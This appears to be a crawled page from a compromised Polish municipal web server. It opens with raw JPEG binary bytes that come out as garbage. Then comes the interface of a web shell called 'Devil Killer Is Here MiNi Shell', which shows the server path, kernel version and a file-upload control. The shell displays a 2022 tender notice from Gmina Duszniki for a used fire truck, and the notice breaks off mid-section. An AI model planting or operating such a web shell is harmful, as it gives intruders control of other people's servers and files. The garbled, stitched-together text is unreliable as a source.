JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20221121/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20221121/0045014001-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Zakup samochodu dla Ochotniczej Straży Pożarnej w Grzebienisku </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzi podmiot, któremu powierzono przeprowadzenie postępowania</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Duszniki</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 631258365</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Sportowa 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Duszniki</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">64-550</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL418 - Poznański</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">urzad@duszniki.eu</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.duszniki.eu</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> Ochotnicza Straż Pożarna w Grzebienisku z siedzibą w Grzebienisku, ul. Szkolna 8a, 64-553 Grzebienisko </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Porządek i bezpieczeństwo publiczne</span> </h3> <h3 class="mb-0">1.11.) Dane podmiotu, któremu zamawiający powierzył przeprowadzenie postępowania.</h3> <h3 class="p-2 mt-4 bg-light">Podmiot <span class="normal">1</span></h3> <h3 class="mb-0">1.11.1.) Nazwa podmiotu prowadzącego postępowanie: <span class="normal">Gmina Duszniki</span></h3> <h3 class="mb-0">1.11.2.) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 631258365</span></h3> <h3 class="mb-0">Adres podmiotu prowadzącego postępowanie: </h3> <h3 class="mb-0">1.11.3.) Ulica: <span class="normal">Sportowa 1</span></h3> <h3 class="mb-0">1.11.4.) Miejscowość: <span class="normal">Duszniki</span></h3> <h3 class="mb-0">1.11.5.) Kod pocztowy: <span class="normal">64-550</span></h3> <h3 class="mb-0">1.11.6.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.11.7.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.11.8.) Lokalizacja NUTS 3: <span class="normal">PL418 - Poznański</span></h3> <h3 class="mb-0">1.11.11.) Adres poczty elektronicznej: <span class="normal">urzad@duszniki.eu</span></h3> <h3 class="mb-0">1.11.12.) Adres strony internetowej: <span class="normal">www.duszniki.eu</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Zakup samochodu dla Ochotniczej Straży Pożarnej w Grzebienisku </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-effc2e2e-69b2-11ed-aea3-5a7c432eaced</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00450140</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-11-21</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00022145/10/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.4 Zakup samochodu dla Ochotniczej Straży Pożarnej w Grzebienisku</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/gmina_duszniki <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/gmina_duszniki</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Postępowanie prowadzone jest w<br/>języku polskim, w formie elektronicznej, za pośrednictwem platformy<br/>zakupowej – dalej zwanej „Platformą”, dostępnej pod adresem strony internetowej:<br/>https://platformazakupowa.pl/pn/gmina_duszniki .Komunikacja między Zamawiającym a<br/>Wykonawcami, w tym wszelkie oświadczenia, wnioski, zawiadomienia oraz informacje, przekazywane<br/>są w formie elektronicznej za pośrednictwem Platformy i formularza „Wyślij wiadomość do<br/>Zamawiającego”. Za datę przekazania (wpływu) oświadczeń, wniosków, zawiadomień oraz informacji<br/>przyjmuje się datę ich przesłania za pośrednictwem Platformy poprzez kliknięcie przycisku „Wyślij<br/>wiadomość do Zamawiającego”, po których pojawi się komunikat, że wiadomość została wysłana do<br/>Zamawiającego.Zamawiający będzie przekazywał Wykonawcom informacje w formie elektronicznej za<br/>pośrednictwem Platformy. Informacje dotyczące odpowiedzi na pytania, zmiany SWZ, zmiany terminu<br/>składania i otwarcia ofert Zamawiający będzie zamieszczał na Platformie w sekcji „Komunikaty”.<br/>Korespondencja, której zgodnie z obowiązującymi przepisami adresatem jest konkretny Wykonawca,<br/>będzie przekazywana w formie elektronicznej za pośrednictwem Platformy do konkretnego<br/>Wykonawcy. Wykonawca jako podmiot profesjonalny ma obowiązek sprawdzania komunikatów i<br/>wiadomości przesłanych przez Zamawiającego bezpośrednio na Platformie, gdyż system powiadomień<br/>może ulec awarii lub powiadomienie może trafić do folderu SPAM.6. Jeżeli Zamawiający lub<br/>Wykonawca przekazują oświadczenia, wnioski, zawiadomienia oraz informacje przy użyciu środków<br/>komunikacji elektronicznej, każda ze stron na żądanie drugiej niezwłocznie potwierdza fakt ich<br/>otrzymania. W przypadku braku potwierdzenia otrzymania dokumentu, domniemywa się, że każda ze<br/>stron zapoznała się z jego treścią w momencie przesłania drogą elektroniczną. Zamawiający, zgodnie z<br/>rozporządzeniem Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i<br/>przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środki<br/>komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie,<br/>określa niezbędne wymagania sprzętowo – aplikacyjne umożliwiające pracę na Platformie, tj.: stały<br/>dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s, komputer klasy<br/>PC lub MAC, o następującej konfiguracji: pamięć min. 2 GB RAM, procesor Intel IV 2 GHz lub jego<br/>nowsza wersja, jeden z systemów operacyjnych – MS Windows 7, Mac Os X 10 4, Linux lub ich nowsze wersje, zainstalowana dowolna przeglądarka internetowa, w<br/>przypadku Internet Explorer minimalnie wersja 10 0., włączona obsługa JavaScript, zainstalowany<br/>program Adobe Acrobat Reader lub inny obsługujący format plików .pdf, Platforma działa według<br/>standardu przyjętego w komunikacji sieciowej – kodowanie UTF8, oznaczenie czasu odbioru danych<br/>przez Platformę Zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu<br/>lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar. Wykonawca, przystępując<br/>do niniejszego postępowania o udzielenie zamówienia publicznego:1) akceptuje warunki korzystania z<br/>Platformy, określone w Regulaminie zamieszczonym na stronie internetowej pod adresem:<br/>https://platformazakupowa.pl/strona/1-regulamin w zakładce „Regulamin” oraz uznaje go za wiążący,2)<br/>zapoznał i stosuje się do Instrukcji składania ofert/wniosków dostępnej pod adresem strony<br/>internetowej: https://drive.google.com/file/d/1Kd1DttbBeiNWt4q4slS4t76lZVKPbkyD/view .Zamawiający<br/>informuje, że instrukcje korzystania z Platformy dotyczące w szczególności logowania, pobrania<br/>dokumentacji, składania wniosków o wyjaśnienie treści SWZ, składania ofert oraz innych czynności<br/>podejmowanych w niniejszym postępowaniu przy użyciu Platformy znajdują się w zakładce „Instrukcje<br/>dla Wykonawców” pod adresem strony internetowej: https://platformazakupowa.pl/strona/45-instrukcje.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia<br/>27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego<br/>przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z<br/>04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>• administratorem Pani/Pana danych osobowych jest: Ochotnicza Straż Pożarna<br/>w Grzebienisku z siedzibą w Grzebienisku, ul. Szkolna 8a, 64-553 Grzebienisko oraz Gmina Duszniki<br/>z siedzibą w Dusznikach, ul. Sportowa 1, 64-550 Duszniki, tel. 61 29 19 075, e-mail: urzad@duszniki.eu,<br/>• inspektorem ochrony danych osobowych w Gminie Duszniki jest osoba, z którą można się skontaktować w sprawach ochrony<br/>swoich danych osobowych i realizacji swoich praw: telefonicznie pod nr 61 29 19 075 wew. 110, za pomocą poczty elektronicznej na<br/>adres<br/>e-mail: admin@duszniki.eu lub pisemnie na adres podany wyżej,<br/>• Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o<br/>udzielenie zamówienia publicznego pn. „Zakup samochodu dla Ochotniczej Straży Pożarnej w Grzebienisku”, prowadzonym w trybie<br/>podstawowym bez negocjacji,<br/>• odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w<br/>oparciu o art. 18 i art. 74 ustawy Pzp,<br/>• Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia<br/>postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas<br/>trwania umowy. Protokół postępowania wraz z załącznikami przechowywany będzie przez cały okres obowiązywania umowy w<br/>sprawie zamówienia publicznego (zgodnie z art. 78 ust. 4 ustawy Pzp),<br/>• obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje<br/>niepodania określonych danych wynikają z ustawy Pzp,<br/>• w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22<br/>RODO,<br/>• posiada Pani/Pan:<br/>􀀁􀀁 na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących,<br/>􀀁􀀁 na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych (skorzystanie z prawa do sprostowania nie<br/>może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie<br/>niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników),<br/>􀀁􀀁 na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>przypadków, o których mowa<br/>w art. 18 ust. 2 RODO,<br/>􀀁􀀁 prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych<br/>osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>• nie przysługuje Pani/Panu:<br/>􀀁􀀁 w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych,<br/>􀀁􀀁 prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO,<br/>􀀁􀀁 na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO;</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">1. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia<br/>27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego<br/>przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z<br/>04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>• administratorem Pani/Pana danych osobowych jest: Ochotnicza Straż Pożarna<br/>w Grzebienisku z siedzibą w Grzebienisku, ul. Szkolna 8a, 64-553 Grzebienisko oraz Gmina Duszniki<br/>z siedzibą w Dusznikach, ul. Sportowa 1, 64-550 Duszniki, tel. 61 29 19 075, e-mail: urzad@duszniki.eu,<br/>• inspektorem ochrony danych osobowych w Gminie Duszniki jest osoba, z którą można się skontaktować w sprawach ochrony<br/>swoich danych osobowych i realizacji swoich praw: telefonicznie pod nr 61 29 19 075 wew. 110, za pomocą poczty elektronicznej na<br/>adres<br/>e-mail: admin@duszniki.eu lub pisemnie na adres podany wyżej,<br/>• Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o<br/>udzielenie zamówienia publicznego pn. „Zakup samochodu dla Ochotniczej Straży Pożarnej w Grzebienisku”, prowadzonym w trybie<br/>podstawowym bez negocjacji,<br/>• odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w<br/>oparciu o art. 18 i art. 74 ustawy Pzp,<br/>• Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia<br/>postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas<br/>trwania umowy. Protokół postępowania wraz z załącznikami przechowywany będzie przez cały okres obowiązywania umowy w<br/>sprawie zamówienia publicznego (zgodnie z art. 78 ust. 4 ustawy Pzp),<br/>• obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje<br/>niepodania określonych danych wynikają z ustawy Pzp,<br/>• w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22<br/>RODO,<br/>• posiada Pani/Pan:<br/>􀀁􀀁 na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących,<br/>􀀁􀀁 na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych (skorzystanie z prawa do sprostowania nie<br/>może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie<br/>niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników),<br/>􀀁􀀁 na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>przypadków, o których mowa<br/>w art. 18 ust. 2 RODO,<br/>􀀁􀀁 prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych<br/>osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>• nie przysługuje Pani/Panu:<br/>􀀁􀀁 w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych,<br/>􀀁􀀁 prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO,<br/>􀀁􀀁 na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO;</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RRG.271.23.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Zamówienie dotyczy zakupu używanego, średniego samochodu pożarniczego z napędem 4x4 <br/>dla jednostki Ochotniczej Straży Pożarnej w Grzebienisku.<br/>2.	Przedmiot zamówienia należy dostarczyć do siedziby Ochotniczej Straży Pożarnej w Grzebienisku<br/> przy ul. Szkolnej 8a w Grzebienisku, 64-553 Grzebienisko.<br/>3.	Szczegółowy opis przedmiotu zamówienia wraz z opisem wymagań dla średniego samochodu pożarniczego z napędem 4x4, stanowi załącznik nr 1 do SWZ.<br/>4.	Wszystkie wymagania określone w załączniku nr 1 do SWZ stanowią wymagania minimalne. Niespełnienie ww. wymagań minimalnych będzie skutkować odrzuceniem oferty jako niezgodnej <br/>z warunkami zamówienia.<br/>5.	Zamawiający wymaga udzielenia przez Wykonawcę gwarancji jakości na przedmiot zamówienia <br/>na okres 6 miesięcy od dnia jego odbioru. Szczegółowe warunki gwarancji jakości zostały określone <br/>w projektowanych postanowieniach umowy.<br/>6.	Zamawiający dopuszcza rozwiązania równoważne. W każdym przypadku użycia w opisie przedmiotu zamówienia norm, ocen technicznych, specyfikacji technicznych i systemów referencji technicznych, o których mowa w art. 101 ust. 1 pkt 2 oraz ust. 3 ustawy Pzp Wykonawca powinien przyjąć, że odniesieniu takiemu towarzyszą wyrazy „lub równoważne”. W przypadku użycia odniesień do norm, europejskich ocen technicznych, aprobat, specyfikacji technicznych i systemów referencji technicznych Zamawiający dopuszcza rozwiązania równoważne opisywanym. Wykonawca analizując opis przedmiotu zamówienia powinien założyć, że każdemu odniesieniu użytemu w opisie przedmiotu zamówienia towarzyszy wyraz „lub równoważne&#34;. W przypadku, gdy zostały użyte znaki towarowe, oznacza to, że są podane przykładowo i określają jedynie minimalne oczekiwane parametry jakościowe oraz wymagany standard. Wykonawca może zastosować materiały lub urządzenia równoważne, lecz o parametrach technicznych i jakościowych podobnych lub lepszych, których zastosowanie w żaden sposób nie wpłynie negatywnie na prawidłowe funkcjonowanie przedmiotu zamówienia. Wykonawca, który zastosuje urządzenia lub materiały równoważne będzie obowiązany wykazać w trakcie realizacji zamówienia, że zastosowane przez niego urządzenia i materiały spełniają wymagania określone przez Zamawiającego. Użycie etykiety oznacza, że Zamawiający akceptuje wszystkie etykiety potwierdzające, że dane dostawy spełniają równoważne wymagania określonej przez zamawiającego etykiety. W przypadku gdy Wykonawca z przyczyn od niego niezależnych nie może uzyskać określonej przez Zamawiającego etykiety <br/>lub równoważnej etykiety, Zamawiający, w terminie, przez siebie wyznaczonym akceptuje inne odpowiednie przedmiotowe środki dowodowe, w szczególności dokumentację techniczną producenta, o ile dany wykonawca udowodni, że dostawy, które mają zostać przez niego wykonane, spełniają wymagania określonej etykiety lub określone wymagania wskazane przez Zamawiającego. Użycie wymogu posiadania certyfikatu wydanego przez jednostkę oceniającą zgodność lub sprawozdania z badań przeprowadzonych przez tę jednostkę jako środka dowodowego potwierdzającego zgodność z wymaganiami lub cechami określonymi w opisie przedmiotu zamówienia, kryteriach oceny ofert lub warunkach realizacji zamówienia oznacza, że zamawiający akceptuje również certyfikaty wydane przez inne równoważne jednostki oceniające zgodność. Zamawiający akceptuje także inne odpowiednie środki dowodowe, w szczególności dokumentację techniczną producenta, w przypadku, gdy dany Wykonawca nie ma ani dostępu do certyfikatów lub sprawozdań z badań, ani możliwości ich uzyskania w odpowiednim terminie, o ile ten brak dostępu nie może być przypisany danemu Wykonawcy, oraz pod warunkiem że dany Wykonawca udowodni, że wykonywane przez niego dostawy spełniają wymogi lub kryteria określone w opisie przedmiotu zamówienia, kryteriach oceny ofert lub wymagania związane z realizacją zamówienia. Celem niniejszego postępowania jest osiągnięcie określonej w SWZ jakości i funkcjonalności. Wykonawca, który powołuje się na rozwiązania równoważne, jest zobowiązany wykazać, że oferowane przez niego rozwiązanie spełnia wymagania określone przez Zamawiającego. <br/>7.	Termin wykonania zamówienia: 20 dni (kalendarzowych) od dnia podpisania umowy.<br/>8.	Wspólny Słownik Zamówień (CPV): 34144210-3 – Wozy strażackie. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">34144210-3 - Wozy strażackie</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">20 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: 